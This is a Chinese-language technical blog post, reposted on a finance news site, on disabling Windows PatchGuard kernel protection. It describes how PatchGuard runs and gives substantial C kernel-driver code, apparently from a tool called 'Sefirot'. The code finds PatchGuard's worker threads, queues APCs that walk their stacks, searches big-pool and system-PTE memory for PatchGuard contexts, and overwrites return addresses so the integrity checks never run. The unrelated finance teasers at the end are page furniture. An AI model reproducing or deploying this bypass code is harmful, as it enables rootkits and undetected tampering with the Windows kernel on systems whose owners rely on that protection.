PatchGuad 处于执行状态时,首先解密头部的CmpAppendDllSection,然后在CmpAppendDllSection内部完整解密整个Context,进入PatchGuardEntryPointer,替换IDT,关闭DR中,自检,插入Worker(自捡成功的话),清空栈,进入FsRtlUninitializeSmallMcb》。
这里FsRtlUninitializeSmallMcb 就是 PatchGuad 的执行主逻辑,在这个逻辑中大部分时间PatchGuad 都是出于延时状态以减少CPU 占用
攻击逻辑首先是枚举当前的Worker 线程,我使用的方法是把自己先插入到Worker,然后通过对比入口点来判断Worker 线程,然后每个Work线程插入一个特殊模式的Apc(保存现场->检测逻辑)。
VOID
NTAPI
PgCheckAllWorkerThread(
__inout PPGBLOCK PgBlock
)
{
NTSTATUS Status = STATUS_SUCCESS;
PSYSTEM_PROCESS_INFORMATION ProcessInfo = NULL;
PSYSTEM_EXTENDED_THREAD_INFORMATION ThreadInfo = NULL;
PVOID Buffer = NULL;
ULONG BufferSize = PAGE_SIZE;
ULONG ReturnLength = 0;
ULONG Index = 0;
PULONG64 InitialStack = 0;
DISPATCHER_HEADER * Header = NULL;
/*
if (os build >= 9600){
PgBlock->WorkerContext = struct _DISPATCHER_HEADER
Header->Type = 0x15
Header->Hand = 0xac
}
else {
PgBlock->WorkerContext = enum _WORK_QUEUE_TYPE
CriticalWorkQueue = 0
DelayedWorkQueue = 1
}
*/
InitialStack = IoGetInitialStack();
if (GetGpBlock(PgBlock)->BuildNumber >= 9600) {
while ((ULONG64)InitialStack != (ULONG64)&PgBlock) {
Header = *(PVOID *)InitialStack;
if (FALSE != MmIsAddressValid(Header)) {
if (FALSE != MmIsAddressValid((PCHAR)(Header + 1) - 1)) {
if (0x15 == Header->Type &&
0xac == Header->Hand) {
PgBlock->WorkerContext = Header;
break;
}
}
}
InitialStack--;
}
}
else {
PgBlock->WorkerContext = UlongToPtr(CriticalWorkQueue);
}
retry:
Buffer = ExAllocatePool(
NonPagedPool,
BufferSize);
if (NULL != Buffer) {
RtlZeroMemory(
Buffer,
BufferSize);
Status = ZwQuerySystemInformation(
SystemExtendedProcessInformation,
Buffer,
BufferSize,
&ReturnLength);
if (NT_SUCCESS(Status)) {
ProcessInfo = (PSYSTEM_PROCESS_INFORMATION)Buffer;
while (TRUE) {
if (PsGetCurrentProcessId() == ProcessInfo->UniqueProcessId) {
ThreadInfo = (PSYSTEM_EXTENDED_THREAD_INFORMATION)
(ProcessInfo + 1);
if (NULL == PgBlock->ExpWorkerThread) {
for (Index = 0;
Index < ProcessInfo->NumberOfThreads;
Index++) {
if ((ULONG64)PsGetCurrentThreadId() ==
(ULONG64)ThreadInfo[Index].ThreadInfo.ClientId.UniqueThread) {
PgBlock->ExpWorkerThread = ThreadInfo[Index].Win32StartAddress;
break;
}
}
}
if (NULL != PgBlock->ExpWorkerThread) {
for (Index = 0;
Index < ProcessInfo->NumberOfThreads;
Index++) {
if ((ULONG64)PsGetCurrentThreadId() !=
(ULONG64)ThreadInfo[Index].ThreadInfo.ClientId.UniqueThread &&
(ULONG64)PgBlock->ExpWorkerThread ==
(ULONG64)ThreadInfo[Index].Win32StartAddress) {
AsyncCall(
ThreadInfo[Index].ThreadInfo.ClientId.UniqueThread,
NULL,
NULL,
(PUSER_THREAD_START_ROUTINE)PgCheckWorkerThread,
PgBlock);
}
}
}
break;
}
if (0 == ProcessInfo->NextEntryOffset) {
break;
}
else {
ProcessInfo = (PSYSTEM_PROCESS_INFORMATION)
((PCHAR)ProcessInfo + ProcessInfo->NextEntryOffset);
}
}
}
ExFreePool(Buffer);
Buffer = NULL;
if (STATUS_INFO_LENGTH_MISMATCH == Status) {
BufferSize = ReturnLength;
goto retry;
}
}
}Apc的逻辑主要是栈回溯,当回溯到无模块的返回点时就会停止回溯,通过最后一个回溯点是不是NULL来判断是不是要检测的线程。当然这里可能存在无模块的其他驱动(比如某P),先通过BigPool 和 SystemPtes 搜索出内存块的大小,这里不得不吐槽一下 RtlFindSetBits有坑。
VOID
NTAPI
PgLocatePoolObject(
__inout PPGBLOCK PgBlock,
__in PPGOBJECT Object
)
{
PFN_NUMBER Index = 0;
PVOID Establisher = NULL;
GetCounterBody(&Object->Establisher, &Establisher);
for (Index = 0;
Index < PgBlock->PoolBigPageTableSize;
Index++) {
if (POOL_BIG_TABLE_ENTRY_FREE !=
((ULONG64)PgBlock->PoolBigPageTable[Index].Va & POOL_BIG_TABLE_ENTRY_FREE)) {
if (NonPagedPool == PgBlock->MmDeterminePoolType(PgBlock->PoolBigPageTable[Index].Va)) {
if (PgBlock->PoolBigPageTable[Index].NumberOfPages > PgBlock->SizeINITKDBG) {
if ((ULONG64)Establisher >= (ULONG64)PgBlock->PoolBigPageTable[Index].Va &&
(ULONG64)Establisher < (ULONG64)PgBlock->PoolBigPageTable[Index].Va +
PgBlock->PoolBigPageTable[Index].NumberOfPages) {
Object->BaseAddress = PgBlock->PoolBigPageTable[Index].Va;
Object->RegionSize = PgBlock->PoolBigPageTable[Index].NumberOfPages;
#ifndef PUBLIC
DbgPrint(
"[Sefirot] [PatchGuard] < %p > found region in pool < %p - %08x >\n",
Establisher,
Object->BaseAddress,
Object->RegionSize);
#endif // !PUBLIC
Object->Type = PgPoolBigPage;
break;
}
}
}
}
}
}
VOID
NTAPI
PgLocateSystemPtesObject(
__inout PPGBLOCK PgBlock,
__in PPGOBJECT Object
)
{
PRTL_BITMAP BitMap = NULL;
ULONG BitMapSize = 0;
PFN_NUMBER NumberOfPtes = 0;
ULONG HintIndex = 0;
ULONG StartingRunIndex = 0;
PVOID Establisher = NULL;
NumberOfPtes = PgBlock->NumberOfPtes;
GetCounterBody(&Object->Establisher, &Establisher);
BitMapSize =
sizeof(RTL_BITMAP) +
(ULONG)((((NumberOfPtes + 1) + 31) / 32) * 4);
BitMap = ExAllocatePool(NonPagedPool, BitMapSize);
if (NULL != BitMap) {
RtlInitializeBitMap(
BitMap,
(PULONG)(BitMap + 1),
(ULONG)(NumberOfPtes + 1));
RtlClearAllBits(BitMap);
InitializeSystemPtesBitMap(
PgBlock->BasePte,
NumberOfPtes,
BitMap);
do {
HintIndex = RtlFindSetBits(
BitMap,
1,
HintIndex);
if (MAXULONG != HintIndex) {
RtlFindNextForwardRunClear(
BitMap,
HintIndex,
&StartingRunIndex);
RtlClearBits(BitMap, HintIndex, StartingRunIndex - HintIndex);
if ((ULONG64)Establisher >=
(ULONG64)GetVirtualAddressMappedByPte(
PgBlock->BasePte + HintIndex) &&
(ULONG64)Establisher <
(ULONG64)GetVirtualAddressMappedByPte(
PgBlock->BasePte + StartingRunIndex) - PgBlock->SizeCmpAppendDllSection) {
Object->BaseAddress =
GetVirtualAddressMappedByPte(PgBlock->BasePte + HintIndex);
Object->RegionSize =
(SIZE_T)(StartingRunIndex - HintIndex) * PAGE_SIZE;
#ifndef PUBLIC
DbgPrint(
"[Sefirot] [PatchGuard] < %p > found region in system ptes < %p - %08x >\n",
Establisher,
Object->BaseAddress,
Object->RegionSize);
#endif // !PUBLIC
Object->Type = PgSystemPtes;
break;
}
HintIndex = StartingRunIndex;
}
} while (HintIndex < NumberOfPtes);
ExFreePool(BitMap);
}
}
VOID
NTAPI
PgLocateObject(
__inout PPGBLOCK PgBlock,
__out PPGOBJECT Object
)
{
IpiSingleCall(
(PPS_APC_ROUTINE)NULL,
(PKSYSTEM_ROUTINE)PgLocatePoolObject,
(PUSER_THREAD_START_ROUTINE)PgBlock,
(PVOID)Object);
if (-1 == Object->Type) {
IpiSingleCall(
(PPS_APC_ROUTINE)NULL,
(PKSYSTEM_ROUTINE)PgLocateSystemPtesObject,
(PUSER_THREAD_START_ROUTINE)PgBlock,
(PVOID)Object);
}
}然后在内存块搜索 PatchGuardEntryPointer的头部代码来判断是不是 PatchGuad执行逻辑,如果是释放掉内存->重启Worker,不是则恢复运行环境。为了便于管理,这里使用了对象的设计方法,每个检测到的CONTEXT 分配一个对象。
VOID
NTAPI
PgCheckWorkerThread(
__inout PPGBLOCK PgBlock
)
{
ULONG64 LowLimit = 0;
ULONG64 HighLimit = 0;
PULONG64 InitialStack = 0;
PULONG64 TargetPc = NULL;
ULONG Count = 0;
PCALLERS Callers = NULL;
ULONG Index = 0;
LONG_PTR Reference = 0;
PVOID * Parameters = NULL;
PGOBJECT TempObject = { 0 };
PPGOBJECT Object = NULL;
Callers = ExAllocatePool(
NonPagedPool,
MAX_STACK_DEPTH * sizeof(CALLERS));
if (NULL != Callers) {
Count = WalkFrameChain(
Callers,
MAX_STACK_DEPTH);
if (0 != Count) {
// PrintFrameChain(Callers, 0, Count);
IoGetStackLimits(&LowLimit, &HighLimit);
InitialStack = IoGetInitialStack();
// all worker thread start at KiStartSystemThread and return address == 0
// if null != last return address code is in noimage
if (NULL != Callers[Count - 1].Establisher) {
#ifndef PUBLIC
DbgPrint(
"[Sefirot] [PatchGuard] < %p > found noimage return address in worker thread\n",
Callers[Count - 1].Establisher);
#endif // !PUBLIC
for (TargetPc = (PULONG64)Callers[Count - 1].EstablisherFrame;
(ULONG64)TargetPc < (ULONG64)InitialStack;
TargetPc++) {
// In most cases, PatchGuard code will wait for a random time.
// set return address in current thread stack to _RevertWorkerToSelf
// than PatchGuard code was not continue
if ((ULONG64)*TargetPc == (ULONG64)Callers[Count - 1].Establisher) {
// restart ExpWorkerThread
// ExFrame->P1Home = WorkerContext;
// ExFrame->P2Home = ExpWorkerThread;
// ExFrame->P3Home = PspSystemThreadStartup;
// ExFrame->Return = KiStartSystemThread; <- jmp this function return address == 0
SetCounterBody(
&TempObject.Establisher,
Callers[Count - 1].Establisher);
TempObject.Type = -1;
PgLocateObject(PgBlock, &TempObject);
if (-1 != TempObject.Type) {
Object = PgCreateObject(
PgDeclassified,
TempObject.Type,
TempObject.BaseAddress,
TempObject.RegionSize,
NULL,
PgBlock,
PgBlock->ClearCallback,
Callers[Count - 1].Establisher,
GetGpBlock(PgBlock)->CaptureContext);
if (NULL != Object) {
SetCounterBody(
&Object->Establisher,
Callers[Count - 1].Establisher);
*TargetPc = (ULONG64)&Object->Establisher;
InterlockedIncrementSizeT(&PgBlock->ReferenceCount);
#ifndef PUBLIC
DbgPrint(
"[Sefirot] [PatchGuard] < %p > insert worker thread check code\n",
PgBlock->ReferenceCount);
#endif // !PUBLIC
}
}
break;
}
}
}
}
ExFreePool(Callers);
}
}本文内容仅代表作者观点,不代表本站立场,如若转载,请注明出处:https://www.fx220.com/news/22022.html
赞 (0)
MT5软件string.format格式化详细方法
上一篇
2019年6月6日 pm6:00
美国失业率最新数据,美国为什么这么在乎失业率呢
下一篇
2019年6月6日 pm6:04
相关推荐
-
继小摩花旗之后,对冲基金大幅押注黄金下跌
全球乐观主义的曙光为黄金蒙上了一层阴影。 摩根大通证的资产配置团队在上周表示,由于出现了“周期性复苏、地缘政治紧张局势缓解、货币政策同步放松的迹象”,该投行取消了黄金对冲交易。花旗策略师上周在资产配置报告中也放弃了黄金多头头寸。而在上周早些时候,基金经理加大了对黄金的看跌押注。
-
炒现货白银最少要多少钱
炒现货白银最少要多少钱?现货白银投资最少投资多少钱,这个理论上来说的话只要足够一手的保证金就可以操作的,1kg的需要保证金600左右 ,按三成仓位来算的,普遍做一手也在1800元左…
-
外汇保证金比例,外汇强制平仓保证金比例
今天的课程是帮助大家完成一个最基础的数据计算,那就是如何详细计算自己的盈利/损失,保证金比例,最关键的是通过这样,可以详细的计算出暴仓点位以及合适的止损点位 这边拿一个实际的交易账…
-
外汇商品行情分析及策略5.7
上周回顾 上周非常的不错,给出的原油、欧镑、美日都得到了非常丰厚的利润,而且利润空间都非常大。而目前除了欧镑到了我们之前说的关键位置选择平仓之外,原油和美日的看空方向依旧存在,所以…
-
PTFX外汇骗局 警察介入 崩盘在即
“眼见他起高楼,眼见他楼塌了。”当下,层出不穷的地下外汇交易平台,伪装成国际化正规外汇公司,靠着“拉人头”四处掠金,大搞拆东墙补西墙的游戏。此类平台何时跑路?东窗事发后换个外壳开辟…
-
上交所对4家科创板申报企业 集中采取自律监管措施
11月8日,上交所表示,近期,在有序推进科创板发行上市审核的同时,对前期审核过程中发现的发行人及其中介机构存在的信息披露不当行为,依据相关事实和规则,集中采取自律监管措施。本次处理涉及北京木瓜移动科技股份有限公司、上海新数网络科技股份有限公司、晶晨半导体(上海)股份有限公司、贵州白山云科技股份有限公司(以下分别简称木瓜移动、新数网络、晶晨股份(行情688099,诊股)、白山科技)等科创板申报项目。其中,木瓜移动、新数网络前期已撤回发行上市申请,上交所已终止审核。
-
这一指数创出历史新高 原来“聪明钱”用的这些招
10月以来,外资流入凶猛,除了习惯买入的超级大蓝筹如贵州茅台(行情600519,诊股)等外,还增持了不少细分领域的龙头。尤其是11月以来的持续震荡行情,市场呈现结构性牛市的特征愈发明显,不少细分领域的龙头得到了市场资金的追捧。值得注意的是,在MSCI将迎来A股第三次扩容之际,QFII重仓指数悄然创出历史新高,11月5日收盘,QFII重仓指数报收2728.78点,创出了历史新高。另外QFII调研活动异常活跃,10月以来截至11月4日,QFII机构合计调研上市公司148次,调研上市公司170家。
-
福汇、嘉盛等平台的主要货币对交易成本对比一览
嗖的一下,天气就变冷了,说正事之前小编得唠叨各位一句“该穿秋裤了”!咳…今天,小编想和大伙一起来探讨探讨交易成本。现在,外汇行业的竞争非常激烈,点差、交易成本等很受投资…
